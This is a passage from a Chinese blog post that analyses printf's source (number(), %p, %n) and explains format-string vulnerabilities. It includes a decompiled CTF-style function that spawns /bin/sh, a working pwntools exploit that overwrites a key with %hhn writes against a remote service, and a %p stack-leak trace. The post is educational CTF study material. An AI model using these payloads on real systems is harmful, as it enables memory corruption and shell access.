class="keyword">char</span> *digits=<span class="string">&quot;0123456789ABCDEFGHIGKLMNOPQRSTUVWXYZ&quot;</span>;</span><br><span class="line">    <span class="keyword">int</span> i;</span><br><span class="line">    <span class="comment">//#define SMALL 64，#define LEFT 16，#define ZEROPAD 1，#define SIGN  2</span></span><br><span class="line">    <span class="keyword">if</span>(type&amp;SMALL) digits=<span class="string">&quot;0123456789abcdefghijklmnopqrstuvwxyz&quot;</span>;<span class="comment">//不成立</span></span><br><span class="line">    <span class="keyword">if</span>(type&amp;LEFT) type&amp;=~ZEROPAD;<span class="comment">//false</span></span><br><span class="line">    <span class="keyword">if</span>(base&lt;<span class="number">2</span>||base&gt;<span class="number">36</span>)<span class="comment">//false</span></span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    c=(type&amp;ZEROPAD)?<span class="string">&#x27;0&#x27;</span>:<span class="string">&#x27; &#x27;</span>;<span class="comment">// c=0</span></span><br><span class="line">    <span class="keyword">if</span>(type&amp;SIGN &amp;&amp; num&lt;<span class="number">0</span>)&#123;<span class="comment">//false</span></span><br><span class="line">         sign=<span class="string">&#x27;-&#x27;</span>;</span><br><span class="line">         num=-num;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//#define PLUS 4，#define SPACE 8，#define SPECIAL 32</span></span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">         sign=(type&amp;PLUS)?<span class="string">&#x27;+&#x27;</span>:((type&amp;SPACE)?<span class="string">&#x27; &#x27;</span>:<span class="number">0</span>);<span class="comment">// sign=0</span></span><br><span class="line">    <span class="keyword">if</span>(sign)<span class="comment">//false</span></span><br><span class="line">         size--;</span><br><span class="line">    <span class="keyword">if</span>(type&amp;SPECIAL)<span class="comment">//false</span></span><br><span class="line">         <span class="keyword">if</span>(type==<span class="number">16</span>)</span><br><span class="line">             size-=<span class="number">2</span>;</span><br><span class="line">         <span class="keyword">else</span> <span class="keyword">if</span>(base==<span class="number">8</span>)</span><br><span class="line">             size--;</span><br><span class="line">    i=<span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span>(num==<span class="number">0</span>)<span class="comment">//false</span></span><br><span class="line">        tmp[i++]=<span class="string">&#x27;0&#x27;</span>;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">while</span>(num!=<span class="number">0</span>)</span><br><span class="line">            tmp[i++]=digits[do_div(num,base)];<span class="comment">//tmp[0]=字长，i=1</span></span><br><span class="line">    <span class="keyword">if</span>(i&gt;precision)<span class="comment">//ture</span></span><br><span class="line">        precision=i;<span class="comment">// precision=1</span></span><br><span class="line">    size=-precision;<span class="comment">// size=-1</span></span><br><span class="line">    <span class="keyword">if</span>(!(type&amp;(ZEROPAD+LEFT)))<span class="comment">//false</span></span><br><span class="line">        <span class="keyword">while</span>(size--&gt;<span class="number">0</span>)</span><br><span class="line">            *str++=<span class="string">&#x27; &#x27;</span>;</span><br><span class="line">    <span class="keyword">if</span>(sign)<span class="comment">//ture</span></span><br><span class="line">        *str++=sign;</span><br><span class="line">    <span class="keyword">if</span>(type&amp;SPECIAL)<span class="comment">//false</span></span><br><span class="line">        <span class="keyword">if</span>(base==<span class="number">8</span>)</span><br><span class="line">            *str++=<span class="string">&#x27;0&#x27;</span>;</span><br><span class="line">        <span class="keyword">else</span> <span class="keyword">if</span>(base==<span class="number">16</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            *str++=<span class="string">&#x27;o&#x27;</span>;</span><br><span class="line">            *str++=digits[<span class="number">33</span>];</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span>(!(type&amp;LEFT))</span><br><span class="line">        <span class="keyword">while</span>(size--&gt;<span class="number">0</span>)</span><br><span class="line">            *str++=c;</span><br><span class="line">    <span class="keyword">while</span>(i&lt;precision--)<span class="comment">//false</span></span><br><span class="line">        *str++=<span class="string">&#x27;0&#x27;</span>;</span><br><span class="line">    <span class="keyword">while</span>(i--&gt;<span class="number">0</span>)<span class="comment">//false</span></span><br><span class="line">        *str++=tmp[i];</span><br><span class="line">    <span class="keyword">while</span>(size--&gt;<span class="number">0</span>)<span class="comment">//false</span></span><br><span class="line">        *str++=<span class="string">&#x27; &#x27;</span>;</span><br><span class="line">    <span class="keyword">return</span> str;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这个应该是printf中最复杂的函数了</p>
<p>其实程序在处理第二个参数<strong>va_arg(args,void*)</strong>的时候，就已经把<strong>当前“val”</strong>转化为指针了，这个指针的<strong>长度</strong>为<strong>字长</strong>（一个地址空间的长度）</p>
<p>剩下的部分就是对字符串进行：进制转换，补全，保留小数……这些部分都不是分析的重点</p>
<p>归根到底，<strong>“%p”</strong>就是想把当前的<strong>变量“val”</strong>变为<strong>空类型指针</strong></p>
<p>​        //目前没有搞清楚va_arg(args,void*)是怎么实现的</p>
<p><strong>“%n”：</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> <span class="string">&#x27;n&#x27;</span>:</span><br><span class="line">    ip=va_arg(args,<span class="keyword">int</span> *);</span><br><span class="line">    *ip=(str-buf);</span><br><span class="line">    <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure>
<p>编译过后：“ip=(args += va_round_size(int <em> )，</em>((int <em>* )(args - va_round_size(int </em> )))) ”</p>
<p>“args - va_round_size(int * )”是一个地址，其内容装有“val”的首地址，“val”指向真实的数据</p>
<img src="/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639740337649.png" class width="1639740337649"> 
<p>“int ** ”代表了二阶指针，用于申明其内容“val”也是一个指针</p>
<p>进行第一行的操作后：ip被赋值为“&amp;val”（<strong>逗号表达式</strong>只取最后一个为结果）</p>
<p>“* ip”就是“val”的“data”，“data=(str-buf)”</p>
<p>仔细分析<strong>函数vsprintf</strong>：</p>
<p>遇到“%”前：</p>
<img src="/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639748995340.png" class width="1639748995340"> 
<p>遇到“%”时：（同时，程序根据控制符“n”作出相应的相应）</p>
<img src="/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639750075841.png" class width="1639750075841"> 
<p>遇到“%”后：</p>
<img src="/2021/12/18/Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/1639750018493.png" class width="1639750018493">  
<p>程序不会把“%控制符”存储到“str/buf”中，取而代之的是对应格式的“val”</p>
<p>而“%n”不会打印“val”，而是会改变“val”</p>
<p>“buf”：数组“printbuf”的首地址（“buf/str”就是“printbuf”，用于存储将要打印的数据）</p>
<p>“str”：指针“fmt”遇到字符“%”时，当前指针“str”所指向的地址</p>
<p>“str-buf”：在排除“%控制符”后，将要打印数据的长度</p>
<p>所以<strong>“%n”</strong>可以改变对应“val”的内容，其数值为<strong>在排除“%控制符”后，将要打印数据的长度</strong></p>
<p>了解其他参数：</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/thj_1995/article/details/109772890">https://blog.csdn.net/thj_1995/article/details/109772890</a></p>
<hr>
<h2 id="深入理解格式化漏洞"><a href="#深入理解格式化漏洞" class="headerlink" title="深入理解格式化漏洞"></a>深入理解格式化漏洞</h2><p>通过上文对printf的分析，想必对格式化漏洞的成因已经了解了</p>
<p>先看一段代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">locker</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> s[<span class="number">520</span>]; <span class="comment">// [esp+0h] [ebp-208h] BYREF</span></span><br><span class="line"></span><br><span class="line">  fgets(s, <span class="number">512</span>, <span class="built_in">stdin</span>);</span><br><span class="line">  imagemagic(s);</span><br><span class="line">  <span class="keyword">if</span> ( key == <span class="number">35795746</span> )</span><br><span class="line">    <span class="keyword">return</span> system(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">printf</span>(format, &amp;key, key);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">io = remote(<span class="string">&#x27;111.200.241.244&#x27;</span>,<span class="number">53994</span>)</span><br><span class="line"></span><br><span class="line">key_addr = <span class="number">0x0804A048</span>      <span class="comment">#已知   				</span></span><br><span class="line"></span><br><span class="line">payload=p32(key_addr)      <span class="comment">#0x22          </span></span><br><span class="line">payload+=p32(key_addr+<span class="number">1</span>)   <span class="comment">#0x33           </span></span><br><span class="line">payload+=p32(key_addr+<span class="number">2</span>)   <span class="comment">#0x22           </span></span><br><span class="line">payload+=p32(key_addr+<span class="number">3</span>)   <span class="comment">#0x02           </span></span><br><span class="line"></span><br><span class="line">payload+=<span class="string">&quot;%&quot;</span>+<span class="built_in">str</span>(<span class="number">0x22</span>-<span class="number">4</span>*<span class="number">4</span>)+<span class="string">&quot;c%12$hhn&quot;</span>        <span class="comment">#0x22         # 偏移  为 12</span></span><br><span class="line">payload+=<span class="string">&quot;%&quot;</span>+<span class="built_in">str</span>(<span class="number">0x33</span>-<span class="number">0x22</span>)+<span class="string">&quot;c%13$hhn&quot;</span>       <span class="comment">#0x33         # 偏移  为 13</span></span><br><span class="line">payload+=<span class="string">&quot;%&quot;</span>+<span class="built_in">str</span>(<span class="number">0x122</span>-<span class="number">0x33</span>)+<span class="string">&quot;c%14$hhn&quot;</span>      <span class="comment">#0x22         # 偏移  为 14</span></span><br><span class="line">payload+=<span class="string">&quot;%&quot;</span>+<span class="built_in">str</span>(<span class="number">0x102</span>-<span class="number">0x22</span>)+<span class="string">&quot;c%15$hhn&quot;</span>      <span class="comment">#0x02         # 偏移  为 15</span></span><br><span class="line">								   </span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>
<p>输入“%p”进行泄露：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0000</span>| <span class="number">0xffffcd10</span> --&gt; <span class="number">0xffffcd40</span> (<span class="string">&quot;aaaa-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p\n&quot;</span>)</span><br><span class="line"><span class="number">0004</span>| <span class="number">0xffffcd14</span> --&gt; <span class="number">0xf7fe7b24</span> (pop    edx)</span><br><span class="line"><span class="number">0008</span>| <span class="number">0xffffcd18</span> --&gt; <span class="number">0xffffcf94</span> --&gt; <span class="number">0x0</span> </span><br><span class="line"><span class="number">0012</span>| <span class="number">0xffffcd1c</span> --&gt; <span class="number">0x0</span> </span><br><span class="line"><span class="number">0016</span>| <span class="number">0xffffcd20</span> --&gt; <span class="number">0xf7fb1000</span> --&gt; <span class="number">0x1ead6c</span> </span><br><span class="line"><span class="number">0020</span>| <span class="number">0xffffcd24</span> --&gt; <span class="number">0xf7fb1000</span> --&gt; <span class="number">0x1ead6c</span> </span><br><span class="line"><span class="number">0024</span>| <span class="number">0xffffcd28</span> --&gt; <span class="number">0xffffcf48</span> --&gt; <span class="number">0xffffcf58</span> --&gt; <span class="number">0x0</span> </span><br><span class="line"><span class="number">0028</span>| <span class="number">0xffffcd2c</span> --&gt; <span class="number">0x80484e7</span> (&lt;locker+<span class="number">53</span>&gt;:	add    esp,<span class="number">0x10</span>)</span><br><span class="line"><span class="number">0032</span>| <span class="number">0xffffcd30</span> --&gt; <span class="number">0xffffcd40</span> (<span class="string">&quot;aaaa-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p\n&quot;</span>)</span><br><span class="line"><span class="number">0036</span>| <span class="number">0xffffcd34</span> --&gt; <span class="number">0x200</span></span><br><span class="line"><span class="number">0040</span>| <span class="number">0xffffcd38</span> --&gt; <span class="number">0xf7fb1580</span> --&gt; <span class="number">0xfbad2288</span> </span><br><span class="line"><span class="number">0044</span>| <span class="number">0xffffcd3c</span> --&gt; <span class="number">0xf7fb7ea4</span> </span><br><span class="line"><span class="number">0048</span>| <span class="number">0xffffcd40</span> (<span class="string">&quot;aaaa-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p\n&quot;</span>)</span><br></pre></td></tr></table></figure>
<p>结果：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aaaa<span class="number">-0xf7fe7b24</span><span class="number">-0xffffcf94</span>-(nil)<span class="number">-0xf7fb1000</span><span class="number">-0xf7fb1000</span><span class="number">-0xffffcf48</span><span class="number">-0x80484e7</span><span class="number">-0xffffcd40</span><span class="number">-0x200</span><span class="number">-0xf7fb1580</span><span class="number">-0xf7fb7ea4</span><span class="number">-0x61616161</span><span class="number">-0x2d70252d</span><span class="number">-0x252d7025</span><span class="number">-0x70252d70</span><span class="number">-0x2d70252d</span></span><br></pre></td></tr></table></figure>
<p>可以发现：“fgets”写入“s”的地址为“0xffffcd40”，“printf”格式化参数的地址为“0xffffcd10”</p>
<p>想要利用“fgets”写入<strong>目标数据的地址</strong>并进行修改，必须先知道地址间偏移</p>
<p>这就是格式化字符串漏洞的基本操作</p>
<p><strong>最后说一个有意思的：</strong></p>
<p>在上述分析中“%n”和“%p”都可以把当前“val”转化为<strong>二阶指针</strong>（“va_arg(args,type* )”）</p>
<p>但是它们两个却有不同的效果：</p>
<p>“%p”只能泄露<strong>当前地址中的数据</strong>，如果该数据是个地址，那么它也不会跳转</p>
<p>“%n”则会<strong>跳转所有的地址</strong>，只要读取到地址就会跳转，直到不是地址才会被认为是数据</p>
<p>我觉得“%n”的运算是正常的，它的运算方式类似于<strong>二叉树</strong>，那么为什么“%p”的运算会<strong>“异常”</strong>呢？</p>
<p>原因就在于它的类型转换方式：va_arg(args,void* )</p>
<p>它把“val”转换为了<strong>空类型指针</strong></p>
<p>由于其他指针都包含有地址信息，所以将其他指针的值赋给空类型指针是合法的，反之，将空类型指针赋给其他指针则不被允许，除非进行显式转换 </p>
<p>所以<strong>空类型指针</strong>不能指向<strong>其他类型的指针</strong>，那么被“%p”支配的“val”不会再进行跳转了</p>
<p>参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_40627648/article/details/84672125">https://blog.csdn.net/qq_40627648/article/details/84672125</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/stack/" rel="tag"><i class="fa fa-tag"></i> stack</a>
              <a href="/tags/fmt/" rel="tag"><i class="fa fa-tag"></i> fmt</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/12/12/%E5%A0%86%E6%BA%A2%E5%87%BA+malloc_hook%E5%8A%AB%E6%8C%81/" rel="prev" title="堆溢出+malloc_hook劫持">
      <i class="fa fa-chevron-left"></i> 堆溢出+malloc_hook劫持
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/12/23/dl-runtime-resolve%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90/" rel="next" title="dl_runtime_resolve源码分析">
      dl_runtime_resolve源码分析 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Printf%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90"><span class="nav-number">1.</span> <span class="nav-text">Printf源码分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%86%E6%9E%90printf%E4%B8%AD%E7%9A%84%E5%AE%8F%E5%AE%9A%E4%B9%89%EF%BC%8832%E4%BD%8D%EF%BC%89"><span class="nav-number">2.</span> <span class="nav-text">分析printf中的宏定义（32位）</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%86%E6%9E%90printf%E7%9A%84%E6%8E%A7%E5%88%B6%E7%AC%A6"><span class="nav-number">3.</span> <span class="nav-text">分析printf的控制符</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3%E6%A0%BC%E5%BC%8F%E5%8C%96%E6%BC%8F%E6%B4%9E"><span class="nav-number">4.</span> <span class="nav-text">深入理解格式化漏洞</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="yhellow"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">yhellow</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">126</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">92</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2019 – 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">yhellow</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="Symbols count total">1.7m</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="Reading time total">25:31</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

  

</body>
</html>
